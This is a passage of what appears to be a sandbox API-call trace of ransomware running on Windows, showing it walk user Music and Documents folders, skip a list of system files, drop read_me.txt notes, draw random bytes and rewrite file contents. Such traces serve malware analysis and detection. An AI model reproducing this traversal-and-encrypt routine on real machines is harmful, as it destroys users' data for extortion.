1 [0079.106] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0079.106] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt") returned 51 [0079.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0079.106] QueueUserWorkItem (Function=0x404e00, Context=0x77c, Flags=0x0) returned 1 [0079.106] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39a1d50, ftCreationTime.dwHighDateTime=0x1d4c6bc, ftLastAccessTime.dwLowDateTime=0xf17df010, ftLastAccessTime.dwHighDateTime=0x1d4c6c0, ftLastWriteTime.dwLowDateTime=0xf17df010, ftLastWriteTime.dwHighDateTime=0x1d4c6c0, nFileSizeHigh=0x0, nFileSizeLow=0x40ea, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="tZwE.mp3", cAlternateFileName="")) returned 1 [0079.106] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tZwE.mp3") returned 48 [0079.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tZwE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tzwe.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x784 [0079.106] QueueUserWorkItem (Function=0x404e00, Context=0x784, Flags=0x0) returned 1 [0079.107] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecfc6c60, ftCreationTime.dwHighDateTime=0x1d4d4b2, ftLastAccessTime.dwLowDateTime=0x62dda830, ftLastAccessTime.dwHighDateTime=0x1d4d5a9, ftLastWriteTime.dwLowDateTime=0x62dda830, ftLastWriteTime.dwHighDateTime=0x1d4d5a9, nFileSizeHigh=0x0, nFileSizeLow=0x408b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="w2lKUJHVm929PZjux.wav", cAlternateFileName="W2LKUJ~1.WAV")) returned 1 [0079.107] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\w2lKUJHVm929PZjux.wav") returned 61 [0079.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\w2lKUJHVm929PZjux.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\w2lkujhvm929pzjux.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0079.107] QueueUserWorkItem (Function=0x404e00, Context=0x7c4, Flags=0x0) returned 1 [0079.107] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13635790, ftCreationTime.dwHighDateTime=0x1d4cd12, ftLastAccessTime.dwLowDateTime=0x12013e60, ftLastAccessTime.dwHighDateTime=0x1d4cb84, ftLastWriteTime.dwLowDateTime=0x12013e60, ftLastWriteTime.dwHighDateTime=0x1d4cb84, nFileSizeHigh=0x0, nFileSizeLow=0x4049, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="WQyI402rWkLZPyg_iGt.mp3", cAlternateFileName="WQYI40~1.MP3")) returned 1 [0079.107] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WQyI402rWkLZPyg_iGt.mp3") returned 63 [0079.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\WQyI402rWkLZPyg_iGt.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wqyi402rwklzpyg_igt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0079.107] QueueUserWorkItem (Function=0x404e00, Context=0x778, Flags=0x0) returned 1 [0079.107] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6de95a60, ftCreationTime.dwHighDateTime=0x1d4cfca, ftLastAccessTime.dwLowDateTime=0xba6227d0, ftLastAccessTime.dwHighDateTime=0x1d4d3a0, ftLastWriteTime.dwLowDateTime=0xba6227d0, ftLastWriteTime.dwHighDateTime=0x1d4d3a0, nFileSizeHigh=0x0, nFileSizeLow=0xc51a, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Y91JHn-.wav", cAlternateFileName="")) returned 1 [0079.107] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Y91JHn-.wav") returned 51 [0079.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Y91JHn-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y91jhn-.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c0 [0079.107] QueueUserWorkItem (Function=0x404e00, Context=0x7c0, Flags=0x0) returned 1 [0079.107] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa4c88b0, ftCreationTime.dwHighDateTime=0x1d4cd04, ftLastAccessTime.dwLowDateTime=0x758b0d60, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0x758b0d60, ftLastWriteTime.dwHighDateTime=0x1d4d33d, nFileSizeHigh=0x0, nFileSizeLow=0xce30, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="_TCIZKG m85i6ha7hPsV.wav", cAlternateFileName="_TCIZK~1.WAV")) returned 1 [0079.107] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_TCIZKG m85i6ha7hPsV.wav") returned 64 [0079.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_TCIZKG m85i6ha7hPsV.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_tcizkg m85i6ha7hpsv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7bc [0079.108] QueueUserWorkItem (Function=0x404e00, Context=0x7bc, Flags=0x0) returned 1 [0079.108] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa4c88b0, ftCreationTime.dwHighDateTime=0x1d4cd04, ftLastAccessTime.dwLowDateTime=0x758b0d60, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0x758b0d60, ftLastWriteTime.dwHighDateTime=0x1d4d33d, nFileSizeHigh=0x0, nFileSizeLow=0xce30, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="_tcizkg m85i6ha7hpsv.wav", cAlternateFileName="_TCIZK~1.WAV")) returned 0 [0079.108] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0079.108] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt") returned 51 [0079.108] GetProcessHeap () returned 0x280000 [0079.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a60090 | out: hHeap=0x280000) returned 1 [0079.108] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 65 [0079.108] GetProcessHeap () returned 0x280000 [0079.108] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 Thread: id = 4 os_tid = 0x950 Thread: id = 5 os_tid = 0x954 [0074.196] GetProcessHeap () returned 0x280000 [0074.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c21078 [0074.196] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\*") returned 63 [0074.196] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f40d620, ftCreationTime.dwHighDateTime=0x1d4d5a7, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0074.196] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\.") returned 63 [0074.196] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f40d620, ftCreationTime.dwHighDateTime=0x1d4d5a7, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="..", cAlternateFileName="")) returned 1 [0074.196] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\..") returned 64 [0074.196] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe78e4ad0, ftCreationTime.dwHighDateTime=0x1d4c8f2, ftLastAccessTime.dwLowDateTime=0x16ae7050, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ae7050, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="5HD-s7592GQ5SNRk8p", cAlternateFileName="5HD-S7~1")) returned 1 [0074.196] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\5HD-s7592GQ5SNRk8p") returned 80 [0074.196] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495da8b0, ftCreationTime.dwHighDateTime=0x1d4c992, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="Emjzu37kN6oU", cAlternateFileName="EMJZU3~1")) returned 1 [0074.196] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Emjzu37kN6oU") returned 74 [0074.196] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ecd3170, ftCreationTime.dwHighDateTime=0x1d4c60a, ftLastAccessTime.dwLowDateTime=0xad6fb7c0, ftLastAccessTime.dwHighDateTime=0x1d4c97a, ftLastWriteTime.dwLowDateTime=0xad6fb7c0, ftLastWriteTime.dwHighDateTime=0x1d4c97a, nFileSizeHigh=0x0, nFileSizeLow=0xdec5, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="I4uAdMQhp.doc", cAlternateFileName="I4UADM~1.DOC")) returned 1 [0074.196] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\I4uAdMQhp.doc") returned 75 [0074.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\I4uAdMQhp.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\i4uadmqhp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="read_me.txt") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="autoexec.bat") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="desktop.ini") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="autorun.inf") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="ntuser.dat") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="iconcache.db") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="bootsect.bak") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="boot.ini") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="ntuser.dat.log") returned 0x0 [0074.197] StrStrW (lpFirst="i4uadmqhp.doc", lpSrch="thumbs.db") returned 0x0 [0074.197] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 73 [0074.197] QueueUserWorkItem (Function=0x404e00, Context=0x8b0, Flags=0x0) returned 1 [0074.197] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a3c6a70, ftCreationTime.dwHighDateTime=0x1d4d47d, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="Jog4-T9RreaaV9", cAlternateFileName="JOG4-T~1")) returned 1 [0074.197] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9") returned 76 [0074.197] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94a77360, ftCreationTime.dwHighDateTime=0x1d4caf4, ftLastAccessTime.dwLowDateTime=0x93fc7d30, ftLastAccessTime.dwHighDateTime=0x1d4cb7f, ftLastWriteTime.dwLowDateTime=0x93fc7d30, ftLastWriteTime.dwHighDateTime=0x1d4cb7f, nFileSizeHigh=0x0, nFileSizeLow=0x2e39, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="nYcQnBRciDGAbGX 3.ods", cAlternateFileName="NYCQNB~1.ODS")) returned 1 [0074.197] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\nYcQnBRciDGAbGX 3.ods") returned 83 [0074.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\nYcQnBRciDGAbGX 3.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\nycqnbrcidgabgx 3.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b4 [0074.197] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="read_me.txt") returned 0x0 [0074.197] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="autoexec.bat") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="desktop.ini") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="autorun.inf") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="ntuser.dat") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="iconcache.db") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="bootsect.bak") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="boot.ini") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="ntuser.dat.log") returned 0x0 [0074.198] StrStrW (lpFirst="nycqnbrcidgabgx 3.ods", lpSrch="thumbs.db") returned 0x0 [0074.198] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 74 [0074.198] QueueUserWorkItem (Function=0x404e00, Context=0x8b4, Flags=0x0) returned 1 [0074.198] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.198] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\read_me.txt") returned 73 [0074.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b8 [0074.198] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.198] CloseHandle (hObject=0x8b8) returned 1 [0074.198] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23ed53a0, ftCreationTime.dwHighDateTime=0x1d4cd2f, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="v2IrmQb3e3gp", cAlternateFileName="V2IRMQ~1")) returned 1 [0074.198] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp") returned 74 [0074.198] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9eb95340, ftCreationTime.dwHighDateTime=0x1d4cccb, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="vyjhHPZcYeL8ayTJ2", cAlternateFileName="VYJHHP~1")) returned 1 [0074.198] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\vyjhHPZcYeL8ayTJ2") returned 79 [0074.198] FindNextFileW (in: hFindFile=0x2b2738, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9eb95340, ftCreationTime.dwHighDateTime=0x1d4cccb, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77163c74, dwReserved1=0x77163ca3, cFileName="vyjhHPZcYeL8ayTJ2", cAlternateFileName="VYJHHP~1")) returned 0 [0074.198] FindClose (in: hFindFile=0x2b2738 | out: hFindFile=0x2b2738) returned 1 [0074.199] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\read_me.txt") returned 73 [0074.199] GetProcessHeap () returned 0x280000 [0074.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8c21078 | out: hHeap=0x280000) returned 1 [0074.199] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 46 [0074.199] GetProcessHeap () returned 0x280000 [0074.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8af10e0 | out: hHeap=0x280000) returned 1 [0074.322] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.322] ReadFile (in: hFile=0x770, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.322] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.322] GetProcessHeap () returned 0x280000 [0074.322] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0074.322] GetProcessHeap () returned 0x280000 [0074.322] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0074.322] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0074.322] GetProcessHeap () returned 0x280000 [0074.322] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0074.322] ReadFile (in: hFile=0x770, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x752fd08*=0x14, lpOverlapped=0x0) returned 1 [0074.323] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.323] WriteFile (in: hFile=0x770, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x752fd44*=0x14, lpOverlapped=0x0) returned 1 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3d8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: 